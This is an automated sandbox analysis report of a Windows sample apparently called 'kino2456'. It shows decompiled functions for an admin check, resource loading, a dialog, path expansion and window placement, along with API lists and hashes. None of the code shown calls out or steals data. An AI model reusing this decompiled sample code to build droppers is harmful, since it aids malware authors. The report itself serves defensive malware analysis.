                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096196e
                                                                                                                                                                                                                                    0x00961970
                                                                                                                                                                                                                                    0x00961999
                                                                                                                                                                                                                                    0x0096199c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096199c
                                                                                                                                                                                                                                    0x00961972
                                                                                                                                                                                                                                    0x00961972
                                                                                                                                                                                                                                    0x00961975
                                                                                                                                                                                                                                    0x00961984
                                                                                                                                                                                                                                    0x00961985
                                                                                                                                                                                                                                    0x0096198a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096198c
                                                                                                                                                                                                                                    0x00961991
                                                                                                                                                                                                                                    0x00961996
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961996
                                                                                                                                                                                                                                    0x0096194c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 009617EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009618DD), ref: 0096181A
                                                                                                                                                                                                                                      • Part of subcall function 009617EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0096182C
                                                                                                                                                                                                                                      • Part of subcall function 009617EE: AllocateAndInitializeSid.ADVAPI32(009618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009618DD), ref: 00961855
                                                                                                                                                                                                                                      • Part of subcall function 009617EE: FreeSid.ADVAPI32(?,?,?,?,009618DD), ref: 00961883
                                                                                                                                                                                                                                      • Part of subcall function 009617EE: FreeLibrary.KERNEL32(00000000,?,?,?,009618DD), ref: 0096188A
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 009618EB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 009618F2
                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0096190A
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00961918
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?), ref: 0096192C
                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00961944
                                                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00961964
                                                                                                                                                                                                                                    • EqualSid.ADVAPI32(00000004,?), ref: 0096197A
                                                                                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0096199C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 009619A3
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 009619AD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2168512254-0
                                                                                                                                                                                                                                    • Opcode ID: 85dd7def214a64c4d9018fedf7b99e42d5257ec12e64fe40a0ae2c9891ba5014
                                                                                                                                                                                                                                    • Instruction ID: e955cf167be642a92cefc83ee01479df31dd41928d06668b6c90d227c1416cb4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85dd7def214a64c4d9018fedf7b99e42d5257ec12e64fe40a0ae2c9891ba5014
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84316D71A14209AFDB20DFA5EC98ABFBBBCFF05344F140429E645E2160DB709945EF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0096468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E0096468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}








                                                                                                                                                                                                                                    0x00964699
                                                                                                                                                                                                                                    0x0096469b
                                                                                                                                                                                                                                    0x009646a9
                                                                                                                                                                                                                                    0x009646af
                                                                                                                                                                                                                                    0x009646b4
                                                                                                                                                                                                                                    0x009646bc
                                                                                                                                                                                                                                    0x009646f9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009646f9
                                                                                                                                                                                                                                    0x009646d9
                                                                                                                                                                                                                                    0x009646dd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009646e5
                                                                                                                                                                                                                                    0x009646ef
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009646f5
                                                                                                                                                                                                                                    0x009646ff

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
                                                                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 009646E5
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                    • String ID: TITLE$doza2
                                                                                                                                                                                                                                    • API String ID: 3370778649-4167907646
                                                                                                                                                                                                                                    • Opcode ID: aa0a8ba0f01111c228bee3fd4eddce0964d134a6bdf254b0a8ca6823737d9160
                                                                                                                                                                                                                                    • Instruction ID: ea3a0a5063552112b2598708d1ce3adf3eb57c540c1c3166435507c5f0e3208e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa0a8ba0f01111c228bee3fd4eddce0964d134a6bdf254b0a8ca6823737d9160
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8601A93624C2107BE3501BE59C4DF6B7E2DEBC7F51F050018FA49A7150C9F18C419AB6
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009617EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                                                    			E009617EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x968004; // 0xf4cc89a0
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x96a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00966CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}



















                                                                                                                                                                                                                                    0x009617f6
                                                                                                                                                                                                                                    0x009617fd
                                                                                                                                                                                                                                    0x00961805
                                                                                                                                                                                                                                    0x0096180b
                                                                                                                                                                                                                                    0x0096180d
                                                                                                                                                                                                                                    0x00961815
                                                                                                                                                                                                                                    0x00961818
                                                                                                                                                                                                                                    0x00961820
                                                                                                                                                                                                                                    0x00961824
                                                                                                                                                                                                                                    0x0096182c
                                                                                                                                                                                                                                    0x00961832
                                                                                                                                                                                                                                    0x00961837
                                                                                                                                                                                                                                    0x00961851
                                                                                                                                                                                                                                    0x00961854
                                                                                                                                                                                                                                    0x0096185d
                                                                                                                                                                                                                                    0x00961862
                                                                                                                                                                                                                                    0x0096186c
                                                                                                                                                                                                                                    0x00961872
                                                                                                                                                                                                                                    0x00961877
                                                                                                                                                                                                                                    0x0096187e
                                                                                                                                                                                                                                    0x0096187e
                                                                                                                                                                                                                                    0x00961883
                                                                                                                                                                                                                                    0x00961883
                                                                                                                                                                                                                                    0x0096185d
                                                                                                                                                                                                                                    0x0096188a
                                                                                                                                                                                                                                    0x0096188a
                                                                                                                                                                                                                                    0x009618a2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009618DD), ref: 0096181A
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0096182C
                                                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(009618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009618DD), ref: 00961855
                                                                                                                                                                                                                                    • FreeSid.ADVAPI32(?,?,?,?,009618DD), ref: 00961883
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,009618DD), ref: 0096188A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                    • Opcode ID: ee3a5d2aa6384863cc265357acb1f4bd7ba3b033167874b12e57aa30a8b0ff6a
                                                                                                                                                                                                                                    • Instruction ID: 1b7b5ac5e836336f800a637911f01db4831bec10ea0b83654ed1eec378c4ece4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee3a5d2aa6384863cc265357acb1f4bd7ba3b033167874b12e57aa30a8b0ff6a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211B271E14209AFDB109FA4DC49ABEBBB8EF49700F14056EFA01F3290DB709D049B91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00963450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00963450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E009643D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
					SetDlgItemTextA(_t24, 0x838,  *0x969404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x9691dc = 1;
					goto L8;
				}
				return 0;
			}








                                                                                                                                                                                                                                    0x00963459
                                                                                                                                                                                                                                    0x0096345c
                                                                                                                                                                                                                                    0x009634d8
                                                                                                                                                                                                                                    0x009634de
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009634e0
                                                                                                                                                                                                                                    0x0096345e
                                                                                                                                                                                                                                    0x00963463
                                                                                                                                                                                                                                    0x0096349a
                                                                                                                                                                                                                                    0x009634a0
                                                                                                                                                                                                                                    0x009634a7
                                                                                                                                                                                                                                    0x009634b2
                                                                                                                                                                                                                                    0x009634c4
                                                                                                                                                                                                                                    0x009634cb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009634cb
                                                                                                                                                                                                                                    0x00963468
                                                                                                                                                                                                                                    0x0096346e
                                                                                                                                                                                                                                    0x00963474
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096347c
                                                                                                                                                                                                                                    0x0096348c
                                                                                                                                                                                                                                    0x00963490
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963496
                                                                                                                                                                                                                                    0x00963484
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963486
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963486
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00963490
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0096349A
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 009634B2
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000838), ref: 009634C4
                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 009634CB
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 009634D8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 852535152-612509477
                                                                                                                                                                                                                                    • Opcode ID: b68d8dfd13a0b782f6f9b56bc600eb85411acf445edf6eddfd1c11bf9659dad6
                                                                                                                                                                                                                                    • Instruction ID: 441d1f69269209aa9157df42f875e5fa5fee974550a4d435842271c5675644bb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b68d8dfd13a0b782f6f9b56bc600eb85411acf445edf6eddfd1c11bf9659dad6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A101D431268114ABCB165F65DC0C96DBB68EB46740F11C418F947965B0CFB49F51EF81
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00962AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E00962AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x968004; // 0xf4cc89a0
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x969a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00961680(_t65, E009617C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E009665E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00961680(_t65, E009617C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00966CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}






















                                                                                                                                                                                                                                    0x00962aac
                                                                                                                                                                                                                                    0x00962ab7
                                                                                                                                                                                                                                    0x00962abc
                                                                                                                                                                                                                                    0x00962abe
                                                                                                                                                                                                                                    0x00962ac3
                                                                                                                                                                                                                                    0x00962ac6
                                                                                                                                                                                                                                    0x00962ac9
                                                                                                                                                                                                                                    0x00962ace
                                                                                                                                                                                                                                    0x00962ae6
                                                                                                                                                                                                                                    0x00962bdc
                                                                                                                                                                                                                                    0x00962bdc
                                                                                                                                                                                                                                    0x00962be0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962af2
                                                                                                                                                                                                                                    0x00962afc
                                                                                                                                                                                                                                    0x00962b00
                                                                                                                                                                                                                                    0x00962b05
                                                                                                                                                                                                                                    0x00962b05
                                                                                                                                                                                                                                    0x00962b0b
                                                                                                                                                                                                                                    0x00962bca
                                                                                                                                                                                                                                    0x00962bd1
                                                                                                                                                                                                                                    0x00962b11
                                                                                                                                                                                                                                    0x00962b18
                                                                                                                                                                                                                                    0x00962b26
                                                                                                                                                                                                                                    0x00962b99
                                                                                                                                                                                                                                    0x00962bc8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962b9b
                                                                                                                                                                                                                                    0x00962bae
                                                                                                                                                                                                                                    0x00962bb3
                                                                                                                                                                                                                                    0x00962bb5
                                                                                                                                                                                                                                    0x00962bb5
                                                                                                                                                                                                                                    0x00962bb8
                                                                                                                                                                                                                                    0x00962bb8
                                                                                                                                                                                                                                    0x00962bba
                                                                                                                                                                                                                                    0x00962bbb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962bb8
                                                                                                                                                                                                                                    0x00962b28
                                                                                                                                                                                                                                    0x00962b2e
                                                                                                                                                                                                                                    0x00962b33
                                                                                                                                                                                                                                    0x00962b39
                                                                                                                                                                                                                                    0x00962b3c
                                                                                                                                                                                                                                    0x00962b3c
                                                                                                                                                                                                                                    0x00962b3e
                                                                                                                                                                                                                                    0x00962b3f
                                                                                                                                                                                                                                    0x00962b55
                                                                                                                                                                                                                                    0x00962b5d
                                                                                                                                                                                                                                    0x00962b64
                                                                                                                                                                                                                                    0x00962b64
                                                                                                                                                                                                                                    0x00962b7a
                                                                                                                                                                                                                                    0x00962b7f
                                                                                                                                                                                                                                    0x00962b81
                                                                                                                                                                                                                                    0x00962b81
                                                                                                                                                                                                                                    0x00962b84
                                                                                                                                                                                                                                    0x00962b84
                                                                                                                                                                                                                                    0x00962b86
                                                                                                                                                                                                                                    0x00962b87
                                                                                                                                                                                                                                    0x00962bbf
                                                                                                                                                                                                                                    0x00962bc1
                                                                                                                                                                                                                                    0x00962bc1
                                                                                                                                                                                                                                    0x00962b26
                                                                                                                                                                                                                                    0x00962bda
                                                                                                                                                                                                                                    0x00962bda
                                                                                                                                                                                                                                    0x00962be6
                                                                                                                                                                                                                                    0x00962be6
                                                                                                                                                                                                                                    0x00962bf8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00962AE6
                                                                                                                                                                                                                                    • IsDBCSLeadByte.KERNEL32(00000000), ref: 00962AF2
                                                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00962B12
                                                                                                                                                                                                                                    • CharUpperA.USER32 ref: 00962B1E
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,?), ref: 00962B55
                                                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00962BD4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 571164536-0
                                                                                                                                                                                                                                    • Opcode ID: 6284479df125b3c20d46a63e74926a416ce7171c8ed759190a0ef52b92f1a157
                                                                                                                                                                                                                                    • Instruction ID: 350d0fc0f49c2218a05ca54b25503d1d1930946f0b2da9be88d66b8a25a40848
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6284479df125b3c20d46a63e74926a416ce7171c8ed759190a0ef52b92f1a157
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A74123346086455EDB159F348C14AFD7BADDF93300F18009EE8C297202DBB58E86DB61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009643D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E009643D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x968004; // 0xf4cc89a0
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00966CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}
























                                                                                                                                                                                                                                    0x009643d0
                                                                                                                                                                                                                                    0x009643d8
                                                                                                                                                                                                                                    0x009643df
                                                                                                                                                                                                                                    0x009643e6
                                                                                                                                                                                                                                    0x009643ec
                                                                                                                                                                                                                                    0x009643f1
                                                                                                                                                                                                                                    0x00964400
                                                                                                                                                                                                                                    0x00964403
                                                                                                                                                                                                                                    0x0096440b
                                                                                                                                                                                                                                    0x00964420
                                                                                                                                                                                                                                    0x00964429
                                                                                                                                                                                                                                    0x00964437
                                                                                                                                                                                                                                    0x00964444
                                                                                                                                                                                                                                    0x00964447
                                                                                                                                                                                                                                    0x0096444d
                                                                                                                                                                                                                                    0x00964454
                                                                                                                                                                                                                                    0x0096445b
